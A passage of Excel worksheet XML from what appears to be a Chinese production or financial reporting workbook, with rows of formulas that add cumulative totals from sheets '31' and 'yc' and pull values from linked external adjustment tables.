        <v>5520.34</v>
      </c>
      <c r="V38" s="234">
        <f>U38+yc!V38</f>
        <v>264660.06</v>
      </c>
      <c r="W38" s="235">
        <f>[10]调整表!$V$10</f>
        <v>0</v>
      </c>
      <c r="X38" s="234">
        <f>W38+'31'!X38</f>
        <v>7808</v>
      </c>
      <c r="Y38" s="235">
        <f>X38+yc!Y38</f>
        <v>263915</v>
      </c>
      <c r="Z38" s="235">
        <f>[10]调整表!$Y$10</f>
        <v>7357.671</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1" spans="1:26">
      <c r="A39" s="191"/>
      <c r="B39" s="191"/>
      <c r="C39" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D39" s="193"/>
      <c r="E39" s="194"/>
      <c r="F39" s="194"/>
      <c r="G39" s="194"/>
      <c r="H39" s="194">
        <f>G39+'31'!H39</f>
        <v>0</v>
      </c>
      <c r="I39" s="194">
        <f>H39+yc!I39</f>
        <v>0</v>
      </c>
      <c r="J39" s="194"/>
      <c r="K39" s="194">
        <f>J39+'31'!K39</f>
        <v>0</v>
      </c>
      <c r="L39" s="194">
        <f>K39+yc!L39</f>
        <v>0</v>
      </c>
      <c r="M39" s="194"/>
      <c r="N39" s="195"/>
      <c r="O39" s="200"/>
      <c r="P39" s="236"/>
      <c r="Q39" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R39" s="231">
        <f>[10]调整表!$P$50</f>
        <v>0</v>
      </c>
      <c r="S39" s="232">
        <f>[10]调整表!$Q$50</f>
        <v>1231.546</v>
      </c>
      <c r="T39" s="238">
        <f>[10]调整表!$R$50</f>
        <v>-2.305</v>
      </c>
      <c r="U39" s="234">
        <f>T39+'31'!U39</f>
        <v>9224.755</v>
      </c>
      <c r="V39" s="234">
        <f>U39+yc!V39</f>
        <v>88038.354</v>
      </c>
      <c r="W39" s="235">
        <f>[10]调整表!$V$50</f>
        <v>147</v>
      </c>
      <c r="X39" s="234">
        <f>W39+'31'!X39</f>
        <v>9324</v>
      </c>
      <c r="Y39" s="235">
        <f>X39+yc!Y39</f>
        <v>88083</v>
      </c>
      <c r="Z39" s="238">
        <f>[10]调整表!$Y$50</f>
        <v>1618.701</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1" spans="1:26">
      <c r="A40" s="191"/>
      <c r="B40" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C40" s="193"/>
      <c r="D40" s="193"/>
      <c r="E40" s="194"/>
      <c r="F40" s="194"/>
      <c r="G40" s="225"/>
      <c r="H40" s="194">
        <f>G40+'31'!H40</f>
        <v>0</v>
      </c>
      <c r="I40" s="194">
        <f>H40+yc!I40</f>
        <v>0</v>
      </c>
      <c r="J40" s="194"/>
      <c r="K40" s="194">
        <f>J40+'31'!K40</f>
        <v>0</v>
      </c>
      <c r="L40" s="194">
        <f>K40+yc!L40</f>
        <v>0</v>
      </c>
      <c r="M40" s="194"/>
      <c r="N40" s="195"/>
      <c r="O40" s="200"/>
      <c r="P40" s="219"/>
      <c r="Q40" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R40" s="239">
        <f>[10]调整表!$P$44</f>
        <v>0</v>
      </c>
      <c r="S40" s="240">
        <f>[10]调整表!$Q$44</f>
        <v>0</v>
      </c>
      <c r="T40" s="238">
        <f>[10]调整表!$R$44</f>
        <v>0</v>
      </c>
      <c r="U40" s="234">
        <f>[10]调整表!$S$44</f>
        <v>0</v>
      </c>
      <c r="V40" s="234">
        <f>[10]调整表!$T$44</f>
        <v>0</v>
      </c>
      <c r="W40" s="235">
        <f>[10]调整表!$V$44</f>
        <v>0</v>
      </c>
      <c r="X40" s="234">
        <f>[10]调整表!$W$44</f>
        <v>0</v>
      </c>
      <c r="Y40" s="235">
        <f>[10]调整表!$X$44</f>
        <v>0</v>
      </c>
      <c r="Z40" s="238">
        <f>[10]调整表!$Y$44</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1" spans="1:26">
      <c r="A41" s="191" t="s">
        <v>252</v>
      </c>
      <c r="B41" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C41" s="193"/>
      <c r="D41" s="193"/>
      <c r="E41" s="194">
        <v>12000</v>
      </c>
      <c r="F41" s="194">
        <f>[12]调整表!$D$16</f>
        <v>26129.76</v>
      </c>
      <c r="G41" s="225">
        <f>[12]调整表!$E$16</f>
        <v>0</v>
      </c>
      <c r="H41" s="194">
        <f>G41+'31'!H41</f>
        <v>24414</v>
      </c>
      <c r="I41" s="194">
        <f>H41+yc!I41</f>
        <v>149390</v>
      </c>
      <c r="J41" s="194">
        <f>[12]调整表!$I$16</f>
        <v>0</v>
      </c>
      <c r="K41" s="194">
        <f>J41+'31'!K41</f>
        <v>27253.05</v>
      </c>
      <c r="L41" s="194">
        <f>K41+yc!L41</f>
        <v>148646.59</v>
      </c>
      <c r="M41" s="194">
        <f>[12]调整表!$L$16</f>
        <v>23290.71</v>
      </c>
      <c r="N41" s="195">
        <f>M41/30000*100</f>
        <v>77.6357</v>
      </c>
      <c r="O41" s="200"/>
      <c r="P41" s="213" t="s">
        <v>237</v>
      </c>
      <c r="Q41" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R41" s="239">
        <f>[11]调整表!$P$7</f>
        <v>0</v>
      </c>
      <c r="S41" s="240">
        <f>[11]调整表!$Q$7</f>
        <v>0.621</v>
      </c>
      <c r="T41" s="238">
        <f>[11]调整表!$R$7</f>
        <v>0</v>
      </c>
      <c r="U41" s="234">
        <f>T41+'31'!U41</f>
        <v>0</v>
      </c>
      <c r="V41" s="234">
        <f>U41+yc!V41</f>
        <v>0.621000000000095</v>
      </c>
      <c r="W41" s="235">
        <f>[11]调整表!$V$7</f>
        <v>0</v>
      </c>
      <c r="X41" s="234">
        <f>W41+'31'!X41</f>
        <v>0</v>
      </c>
      <c r="Y41" s="235">
        <f>X41+yc!Y41</f>
        <v>9.45910016980633e-14</v>
      </c>
      <c r="Z41" s="238">
        <f>[11]调整表!$Y$7</f>
        <v>0.621</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" spans="1:26">
      <c r="A42" s="191"/>
      <c r="B42" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C42" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D42" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E42" s="194">
        <v>0</v>
      </c>
      <c r="F42" s="194">
        <f>[12]调整表!$D$13</f>
        <v>0</v>
      </c>
      <c r="G42" s="225">
        <f>[12]调整表!$E$13</f>
        <v>0</v>
      </c>
      <c r="H42" s="194">
        <f>G42+'31'!H42</f>
        <v>0</v>
      </c>
      <c r="I42" s="194">
        <f>H42+yc!I42</f>
        <v>0</v>
      </c>
      <c r="J42" s="194">
        <f>[12]调整表!$I$13</f>
        <v>0</v>
      </c>
      <c r="K42" s="194">
        <f>J42+'31'!K42</f>
        <v>0</v>
      </c>
      <c r="L42" s="194">
        <f>K42+yc!L42</f>
        <v>0</v>
      </c>
      <c r="M42" s="194">
        <f>[12]调整表!$L$13</f>
        <v>0</v>
      </c>
      <c r="N42" s="207">
        <f>(M42+M43)/50000*100</f>
        <v>0</v>
      </c>
      <c r="O42" s="200"/>
      <c r="P42" s="215"/>
      <c r="Q42" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R42" s="237">
        <f>[11]调整表!$P$8</f>
        <v>14000</v>
      </c>
      <c r="S42" s="238">
        <f>[11]调整表!$Q$8</f>
        <v>8478.836</v>
      </c>
      <c r="T42" s="238">
        <f>[11]调整表!$R$8</f>
        <v>0</v>
      </c>
      <c r="U42" s="234">
        <f>T42+'31'!U42</f>
        <v>9627.68</v>
      </c>
      <c r="V42" s="235">
        <f>U42+yc!V42</f>
        <v>217214.65</v>
      </c>
      <c r="W42" s="235">
        <f>[11]调整表!$V$8</f>
        <v>0</v>
      </c>
      <c r="X42" s="234">
        <f>W42+'31'!X42</f>
        <v>13382</v>
      </c>
      <c r="Y42" s="235">
        <f>X42+yc!Y42</f>
        <v>215853</v>
      </c>
      <c r="Z42" s="238">
        <f>[11]调整表!$Y$8</f>
        <v>4724.516</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" spans="1:26">
      <c r="A43" s="191"/>
      <c r="B43" s="193"/>
      <c r="C43" s="193"/>
      <c r="D43" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E43" s="194"/>
      <c r="F43" s="194">
        <f>[12]调整表!$D$14</f>
        <v>0</v>
      </c>
      <c r="G43" s="225">
        <f>[12]调整表!$E$14</f>
        <v>0</v>
      </c>
      <c r="H43" s="194">
        <f>G43+'31'!H43</f>
        <v>0</v>
      </c>
      <c r="I43" s="194">
        <f>H43+yc!I43</f>
        <v>0</v>
      </c>
      <c r="J43" s="194">
        <f>[12]调整表!$I$14</f>
        <v>0</v>
      </c>
      <c r="K43" s="194">
        <f>J43+'31'!K43</f>
        <v>0</v>
      </c>
      <c r="L43" s="194">
        <f>K43+yc!L43</f>
        <v>0</v>
      </c>
      <c r="M43" s="194">
        <f>[12]调整表!$L$14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[12]调整表!$E$44</f>
        <v>0</v>
      </c>
      <c r="H44" s="194">
        <f>G44+'31'!H44</f>
        <v>0</v>
      </c>
      <c r="I44" s="194">
        <f>H44+yc!I44</f>
        <v>128550.22</v>
      </c>
      <c r="J44" s="194">
        <f>[12]调整表!$I$44</f>
        <v>0</v>
      </c>
      <c r="K44" s="194">
        <f>J44+'31'!K44</f>
        <v>0</v>
      </c>
      <c r="L44" s="194">
        <f>K44+yc!L44</f>
        <v>0</v>
      </c>
      <c r="M44" s="194">
        <f>[12]调整表!$L$15</f>
        <v>48773.78</v>
      </c>
      <c r="N44" s="195"/>
      <c r="O44" s="200"/>
      <c r="P44" s="215"/>
      <c r="Q44" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R44" s="237">
        <f>[11]调整表!$P$29</f>
        <v>8000</v>
      </c>
      <c r="S44" s="238">
        <f>[11]调整表!$Q$29</f>
        <v>2299.457</v>
      </c>
      <c r="T44" s="238">
        <f>[11]调整表!$R$29</f>
        <v>-26.7979999999998</v>
      </c>
      <c r="U44" s="234">
        <f>T44+'31'!U44</f>
        <v>7163.302</v>
      </c>
      <c r="V44" s="235">
        <f>U44+yc!V44</f>
        <v>71916.47</v>
      </c>
      <c r="W44" s="235">
        <f>[11]调整表!$V$29</f>
        <v>0</v>
      </c>
      <c r="X44" s="234">
        <f>W44+'31'!X44</f>
        <v>5409</v>
      </c>
      <c r="Y44" s="235">
        <f>X44+yc!Y44</f>
        <v>71819</v>
      </c>
      <c r="Z44" s="238">
        <f>[11]调整表!$Y$29</f>
        <v>4159.479</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" spans="1:26">
      <c r="A45" s="191"/>
      <c r="B45" s="193"/>
      <c r="C45" s="193"/>
      <c r="D45" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E45" s="194"/>
      <c r="F45" s="194"/>
      <c r="G45" s="225">
        <f>[12]调整表!$E$55</f>
        <v>0</v>
      </c>
      <c r="H45" s="194">
        <f>G45+'31'!H45</f>
        <v>0</v>
      </c>
      <c r="I45" s="194">
        <f>H45+yc!I45</f>
        <v>0</v>
      </c>
      <c r="J45" s="225">
        <f>[12]调整表!$I$55</f>
        <v>0</v>
      </c>
      <c r="K45" s="194">
        <f>J45+'31'!K45</f>
        <v>0</v>
      </c>
      <c r="L45" s="194">
        <f>K45+yc!L45</f>
        <v>0</v>
      </c>
      <c r="M45" s="194"/>
      <c r="N45" s="195"/>
      <c r="O45" s="200"/>
      <c r="P45" s="214"/>
      <c r="Q45" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R45" s="237">
        <f>[11]调整表!$P$23</f>
        <v>0</v>
      </c>
      <c r="S45" s="238">
        <f>[11]调整表!$Q$23</f>
        <v>0</v>
      </c>
      <c r="T45" s="238">
        <f>[11]调整表!$R$23</f>
        <v>0</v>
      </c>
      <c r="U45" s="234">
        <f>[11]调整表!$S$23</f>
        <v>0</v>
      </c>
      <c r="V45" s="235">
        <f>[11]调整表!$T$23</f>
        <v>1.329</v>
      </c>
      <c r="W45" s="235">
        <f>[11]调整表!$V$23</f>
        <v>0</v>
      </c>
      <c r="X45" s="234">
        <f>[11]调整表!$W$23</f>
        <v>0</v>
      </c>
      <c r="Y45" s="235">
        <f>[11]调整表!$X$23</f>
        <v>1.329</v>
      </c>
      <c r="Z45" s="238">
        <f>[11]调整表!$Y$23</f>
        <v>0</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" spans="1:26">
      <c r="A46" s="191"/>
      <c r="B46" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C46" s="193"/>
      <c r="D46" s="193"/>
      <c r="E46" s="194"/>
      <c r="F46" s="194"/>
      <c r="G46" s="194"/>
      <c r="H46" s="194">
        <f>G46+'31'!H46</f>
        <v>0</v>
      </c>
      <c r="I46" s="194">
        <f>H46+yc!I46</f>
        <v>0</v>
      </c>
      <c r="J46" s="194">
        <f>J47+J50</f>
        <v>0</v>
      </c>
      <c r="K46" s="194">
        <f>J46+'31'!K46</f>
        <v>0</v>
      </c>
      <c r="L46" s="194">
        <f>K46+yc!L46</f>
        <v>0</v>
      </c>
      <c r="M46" s="194"/>
      <c r="N46" s="195"/>
      <c r="O46" s="200"/>
      <c r="P46" s="242" t="s">
        <v>252</v>
      </c>
      <c r="Q46" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R46" s="237">
        <f>[12]调整表!$P$7</f>
        <v>0</v>
      </c>
      <c r="S46" s="238">
        <f>[12]调整表!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T46" s="238">
        <f>[12]调整表!$R$7</f>
        <v>0</v>
      </c>
      <c r="U46" s="234">
        <f>T46+'31'!U46</f>
        <v>0</v>
      </c>
      <c r="V46" s="234">
        <f>U46+yc!V46</f>
        <v>0</v>
      </c>
      <c r="W46" s="235">
        <f>[12]调整表!$V$7</f>
        <v>0</v>
      </c>
      <c r="X46" s="234">
        <f>W46+'31'!X46</f>
        <v>0</v>
      </c>
      <c r="Y46" s="235">
        <f>X46+yc!Y46</f>
        <v>0</v>
      </c>
      <c r="Z46" s="238">
        <f>[12]调整表!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" spans="1:26">
      <c r="A47" s="191"/>
      <c r="B47" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C47" s="193"/>
      <c r="D47" s="193"/>
      <c r="E47" s="194">
        <v>12000</v>
      </c>
      <c r="F47" s="194"/>
      <c r="G47" s="225"/>
      <c r="H47" s="194">
        <f>G47+'31'!H47</f>
        <v>0</v>
      </c>
      <c r="I47" s="194">
        <f>H47+yc!I47</f>
        <v>0</v>
      </c>
      <c r="J47" s="194">
        <f>SUM(J48:J49)</f>
        <v>0</v>
      </c>
      <c r="K47" s="194">
        <f>J47+'31'!K47</f>
        <v>0</v>
      </c>
      <c r="L47" s="194">
        <f>K47+yc!L47</f>
        <v>0</v>
      </c>
      <c r="M47" s="194"/>
      <c r="N47" s="195"/>
      <c r="O47" s="200"/>
      <c r="P47" s="243"/>
      <c r="Q47" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R47" s="237">
        <f>[12]调整表!$P$8</f>
        <v>0</v>
      </c>
      <c r="S47" s="238">
        <f>[12]调整表!$Q$8</f>
        <v>0</v>
      </c>
      <c r="T47" s="238">
        <f>[12]调整表!$R$8</f>
        <v>0</v>
      </c>
      <c r="U47" s="234">
        <f>T47+'31'!U47</f>
        <v>0</v>
      </c>
      <c r="V47" s="234">
        <f>U47+yc!V47</f>
        <v>0</v>
      </c>
      <c r="W47" s="235">
        <f>[12]调整表!$V$8</f>
        <v>0</v>
      </c>
      <c r="X47" s="234">
        <f>W47+'31'!X47</f>
        <v>0</v>
      </c>
      <c r="Y47" s="235">
        <f>X47+yc!Y47</f>
        <v>0</v>
      </c>
      <c r="Z47" s="238">
        <f>[12]调整表!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" spans="1:26">
      <c r="A48" s="191"/>
      <c r="B48" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C48" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D48" s="193"/>
      <c r="E48" s="194"/>
      <c r="F48" s="194"/>
      <c r="G48" s="225"/>
      <c r="H48" s="194">
        <f>G48+'31'!H48</f>
        <v>0</v>
      </c>
      <c r="I48" s="194">
        <f>H48+yc!I48</f>
        <v>0</v>
      </c>
      <c r="J48" s="194"/>
      <c r="K48" s="194">
        <f>J48+'31'!K48</f>
        <v>0</v>
      </c>
      <c r="L48" s="194">
        <f>K48+yc!L48</f>
        <v>0</v>
      </c>
      <c r="M48" s="194"/>
      <c r="N48" s="195"/>
      <c r="O48" s="200"/>
      <c r="P48" s="243"/>
      <c r="Q48" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R48" s="237">
        <f>[12]调整表!$P$34</f>
        <v>0</v>
      </c>
      <c r="S48" s="238">
        <f>[12]调整表!$Q$34</f>
        <v>1585.503</v>
      </c>
      <c r="T48" s="238">
        <f>[12]调整表!$R$34</f>
        <v>0</v>
      </c>
      <c r="U48" s="234">
        <f>T48+'31'!U48</f>
        <v>1032.38</v>
      </c>
      <c r="V48" s="234">
        <f>U48+yc!V48</f>
        <v>7058.91</v>
      </c>
      <c r="W48" s="235">
        <f>[12]调整表!$V$8</f>
        <v>0</v>
      </c>
      <c r="X48" s="234">
        <f>W48+'31'!X48</f>
        <v>0</v>
      </c>
      <c r="Y48" s="235">
        <f>X48+yc!Y48</f>
        <v>0</v>
      </c>
      <c r="Z48" s="238">
        <f>[12]调整表!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" spans="1:26">
      <c r="A49" s="191"/>
      <c r="B49" s="191"/>
      <c r="C49" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D49" s="193"/>
      <c r="E49" s="194"/>
      <c r="F49" s="194"/>
      <c r="G49" s="194"/>
      <c r="H49" s="194">
        <f>G49+'31'!H49</f>
        <v>0</v>
      </c>
      <c r="I49" s="194">
        <f>H49+yc!I49</f>
        <v>0</v>
      </c>
      <c r="J49" s="194"/>
      <c r="K49" s="194">
        <f>J49+'31'!K49</f>
        <v>0</v>
      </c>
      <c r="L49" s="194">
        <f>K49+yc!L49</f>
        <v>0</v>
      </c>
      <c r="M49" s="194"/>
      <c r="N49" s="195"/>
      <c r="O49" s="200"/>
      <c r="P49" s="197" t="s">
        <v>304</v>
      </c>
      <c r="Q49" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R49" s="237">
        <f>[13]调整表!$P$8</f>
        <v>15340</v>
      </c>
      <c r="S49" s="238">
        <f>[13]调整表!$Q$8</f>
        <v>10593.625</v>
      </c>
      <c r="T49" s="238">
        <f>[13]调整表!$R$8</f>
        <v>0</v>
      </c>
      <c r="U49" s="234">
        <f>T49+'31'!U49</f>
        <v>0</v>
      </c>
      <c r="V49" s="234">
        <f>U49+yc!V49</f>
        <v>179888.95</v>
      </c>
      <c r="W49" s="235">
        <f>[13]调整表!$V$8</f>
        <v>-55.2988999999998</v>
      </c>
      <c r="X49" s="234">
        <f>W49+'31'!X49</f>
        <v>7071.63</v>
      </c>
      <c r="Y49" s="235">
        <f>X49+yc!Y49</f>
        <v>183601.97</v>
      </c>
      <c r="Z49" s="238">
        <f>[13]调整表!$Y$8</f>
        <v>2798.62500000004</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" spans="1:26">
      <c r="A50" s="191"/>
      <c r="B50" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C50" s="193"/>
      <c r="D50" s="193"/>
      <c r="E50" s="194"/>
      <c r="F50" s="194"/>
      <c r="G50" s="225"/>
      <c r="H50" s="194">
        <f>G50+'31'!H50</f>
        <v>0</v>
      </c>
      <c r="I50" s="194">
        <f>H50+yc!I50</f>
        <v>0</v>
      </c>
      <c r="J50" s="194"/>
      <c r="K50" s="194">
        <f>J50+'31'!K50</f>
        <v>0</v>
      </c>
      <c r="L50" s="194">
        <f>K50+yc!L50</f>
        <v>0</v>
      </c>
      <c r="M50" s="194"/>
      <c r="N50" s="195"/>
      <c r="O50" s="200"/>
      <c r="P50" s="200"/>
      <c r="Q50" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R50" s="237">
        <f>[13]调整表!$P$7</f>
        <v>200</v>
      </c>
      <c r="S50" s="238">
        <f>[13]调整表!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T50" s="238">
        <f>[13]调整表!$R$7</f>
        <v>0</v>
      </c>
      <c r="U50" s="234">
        <f>T50+'31'!U50</f>
        <v>0</v>
      </c>
      <c r="V50" s="234">
        <f>U50+yc!V50</f>
        <v>0</v>
      </c>
      <c r="W50" s="235">
        <f>[13]调整表!$V$7</f>
        <v>0</v>
      </c>
      <c r="X50" s="234">
        <f>W50+'31'!X50</f>
        <v>0</v>
      </c>
      <c r="Y50" s="235">
        <f>X50+yc!Y50</f>
        <v>0</v>
      </c>
      <c r="Z50" s="238">
        <f>[13]调整表!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" spans="1:26">
      <c r="A51" s="191" t="s">
        <v>304</v>
      </c>
      <c r="B51" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C51" s="193"/>
      <c r="D51" s="193"/>
      <c r="E51" s="194">
        <v>160000</v>
      </c>
      <c r="F51" s="194">
        <f>[13]调整表!$D$24</f>
        <v>48852.6839999998</v>
      </c>
      <c r="G51" s="225">
        <f>[13]调整表!$E$24</f>
        <v>500</v>
      </c>
      <c r="H51" s="194">
        <f>G51+'31'!H51</f>
        <v>136470</v>
      </c>
      <c r="I51" s="194">
        <f>H51+yc!I51</f>
        <v>1512869</v>
      </c>
      <c r="J51" s="194">
        <f>[13]调整表!$I$24</f>
        <v>0</v>
      </c>
      <c r="K51" s="194">
        <f>J51+'31'!K51</f>
        <v>148811.205</v>
      </c>
      <c r="L51" s="194">
        <f>K51+yc!L51</f>
        <v>1511935.136</v>
      </c>
      <c r="M51" s="194">
        <f>[13]调整表!$L$24</f>
        <v>36357.6689999998</v>
      </c>
      <c r="N51" s="195">
        <f>M51/45000*100</f>
        <v>80.7948199999996</v>
      </c>
      <c r="O51" s="200"/>
      <c r="P51" s="200"/>
      <c r="Q51" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R51" s="237">
        <f>[13]调整表!$P$30</f>
        <v>8550</v>
      </c>
      <c r="S51" s="238">
        <f>[13]调整表!$Q$30</f>
        <v>3251.37400000001</v>
      </c>
      <c r="T51" s="238">
        <f>[13]调整表!$R$30</f>
        <v>0</v>
      </c>
      <c r="U51" s="234">
        <f>T51+'31'!U51</f>
        <v>5220.27</v>
      </c>
      <c r="V51" s="234">
        <f>U51+yc!V51</f>
        <v>68218.741</v>
      </c>
      <c r="W51" s="235">
        <f>[13]调整表!$V$30</f>
        <v>-255.499000000001</v>
      </c>
      <c r="X51" s="234">
        <f>W51+'31'!X51</f>
        <v>5164.789</v>
      </c>
      <c r="Y51" s="235">
        <f>X51+yc!Y51</f>
        <v>65781.026</v>
      </c>
      <c r="Z51" s="238">
        <f>[13]调整表!$Y$30</f>
        <v>3305.40100000001</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" spans="1:26">
      <c r="A52" s="191"/>
      <c r="B52" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C52" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D52" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E52" s="194">
        <v>175000</v>
      </c>
      <c r="F52" s="194">
        <f>[13]调整表!$D$19</f>
        <v>105046.44300005</v>
      </c>
      <c r="G52" s="225">
        <f>[13]调整表!$E$19</f>
        <v>1100</v>
      </c>
      <c r="H52" s="194">
        <f>G52+'31'!H52</f>
        <v>60840.1700000006</v>
      </c>
      <c r="I52" s="194">
        <f>H52+yc!I52</f>
        <v>1444407.42</v>
      </c>
      <c r="J52" s="194">
        <f>[13]调整表!$I$19</f>
        <v>477.321999999986</v>
      </c>
      <c r="K52" s="194">
        <f>J52+'31'!K52</f>
        <v>129122.14</v>
      </c>
      <c r="L52" s="194">
        <f>K52+yc!L52</f>
        <v>1410816.34</v>
      </c>
      <c r="M52" s="194">
        <f>[13]调整表!$L$19</f>
        <v>36764.4730000508</v>
      </c>
      <c r="N52" s="207">
        <f>(M52+M53)/(65000+80000)*100</f>
        <v>25.3548089655523</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[13]调整表!$D$22</f>
        <v>0</v>
      </c>
      <c r="G53" s="225">
        <f>[13]调整表!$E$22</f>
        <v>0</v>
      </c>
      <c r="H53" s="194">
        <f>G53+'31'!H53</f>
        <v>0</v>
      </c>
      <c r="I53" s="194">
        <f>H53+yc!I53</f>
        <v>0</v>
      </c>
      <c r="J53" s="194">
        <f>[13]调整表!$I$22</f>
        <v>0</v>
      </c>
      <c r="K53" s="194">
        <f>J53+'31'!K53</f>
        <v>0</v>
      </c>
      <c r="L53" s="194">
        <f>K53+yc!L53</f>
        <v>0</v>
      </c>
      <c r="M53" s="194">
        <f>[13]调整表!$L$22</f>
        <v>0</v>
      </c>
      <c r="N53" s="212"/>
      <c r="O53" s="200"/>
      <c r="P53" s="223" t="s">
        <v>262</v>
      </c>
      <c r="Q53" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R53" s="245"/>
      <c r="S53" s="237">
        <f>[14]调整表!$M$21+[14]调整表!$M$22+[14]调整表!$M$35</f>
        <v>1648.947</v>
      </c>
      <c r="T53" s="237">
        <f>[14]调整表!$N$21+[14]调整表!$N$22+[14]调整表!$N$35</f>
        <v>-1.392</v>
      </c>
      <c r="U53" s="234">
        <f>T53+'31'!U53</f>
        <v>1305.378</v>
      </c>
      <c r="V53" s="234">
        <f>U53+yc!V53</f>
        <v>39639.805</v>
      </c>
      <c r="W53" s="237">
        <f>[14]调整表!$Q$21+[14]调整表!$Q$22+[14]调整表!$Q$35</f>
        <v>0</v>
      </c>
      <c r="X53" s="234">
        <f>W53+'31'!X53</f>
        <v>1060</v>
      </c>
      <c r="Y53" s="235">
        <f>X53+yc!Y53</f>
        <v>40551</v>
      </c>
      <c r="Z53" s="237">
        <f>[14]调整表!$T$21+[14]调整表!$T$22+[14]调整表!$T$35</f>
        <v>1921.725</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" spans="1:26">
      <c r="A54" s="191"/>
      <c r="B54" s="193"/>
      <c r="C54" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D54" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E54" s="194"/>
      <c r="F54" s="194"/>
      <c r="G54" s="225">
        <f>[13]调整表!$E$23</f>
        <v>0</v>
      </c>
      <c r="H54" s="194">
        <f>G54+'31'!H54</f>
        <v>0</v>
      </c>
      <c r="I54" s="194">
        <f>H54+yc!I54</f>
        <v>0</v>
      </c>
      <c r="J54" s="194">
        <f>[13]调整表!$I$47</f>
        <v>0</v>
      </c>
      <c r="K54" s="194">
        <f>J54+'31'!K54</f>
        <v>16730.398</v>
      </c>
      <c r="L54" s="194">
        <f>K54+yc!L54</f>
        <v>228172.248</v>
      </c>
      <c r="M54" s="194">
        <f>[13]调整表!$L$23</f>
        <v>0</v>
      </c>
      <c r="N54" s="195"/>
      <c r="O54" s="200"/>
      <c r="P54" s="246" t="s">
        <v>263</v>
      </c>
      <c r="Q54" s="242" t="s">
        <v>279</v>
      </c>
      <c r="R54" s="247">
        <f>[15]调整表!$C$43</f>
        <v>0</v>
      </c>
      <c r="S54" s="247">
        <f>[15]调整表!$D$43</f>
        <v>467.66</v>
      </c>
      <c r="T54" s="247">
        <f>[15]调整表!$E$43</f>
        <v>0</v>
      </c>
      <c r="U54" s="234">
        <f>T54+'31'!U54</f>
        <v>0</v>
      </c>
      <c r="V54" s="248">
        <f>U54+yc!V54</f>
        <v>0</v>
      </c>
      <c r="W54" s="249">
        <f>[15]调整表!$H$43</f>
        <v>0</v>
      </c>
      <c r="X54" s="234">
        <f>W54+'31'!X54</f>
        <v>0</v>
      </c>
      <c r="Y54" s="250">
        <f>X54+yc!Y54</f>
        <v>0</v>
      </c>
      <c r="Z54" s="247">
        <f>[15]调整表!$K$43</f>
        <v>467.66</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" spans="1:26">
      <c r="A55" s="191"/>
      <c r="B55" s="193"/>
      <c r="C55" s="193"/>
      <c r="D55" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E55" s="194"/>
      <c r="F55" s="194"/>
      <c r="G55" s="225">
        <f>[13]调整表!$E$63</f>
        <v>0</v>
      </c>
      <c r="H55" s="194">
        <f>G55+'31'!H55</f>
        <v>0</v>
      </c>
      <c r="I55" s="194">
        <f>H55+yc!I55</f>
        <v>0</v>
      </c>
      <c r="J55" s="225">
        <f>[13]调整表!$I$63</f>
        <v>0</v>
      </c>
      <c r="K55" s="194">
        <f>J55+'31'!K55</f>
        <v>9194.742</v>
      </c>
      <c r="L55" s="194">
        <f>K55+yc!L55</f>
        <v>44630.392</v>
      </c>
      <c r="M55" s="194"/>
      <c r="N55" s="195"/>
      <c r="O55" s="200"/>
      <c r="P55" s="251" t="s">
        <v>310</v>
      </c>
      <c r="Q55" s="252" t="s">
        <v>279</v>
      </c>
      <c r="R55" s="253">
        <f>[16]调整表!$P$7</f>
        <v>0</v>
      </c>
      <c r="S55" s="253">
        <f>[16]调整表!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T55" s="253">
        <f>[16]调整表!$R$7</f>
        <v>0</v>
      </c>
      <c r="U55" s="254">
        <f>[16]调整表!$S$7</f>
        <v>0</v>
      </c>
      <c r="V55" s="255">
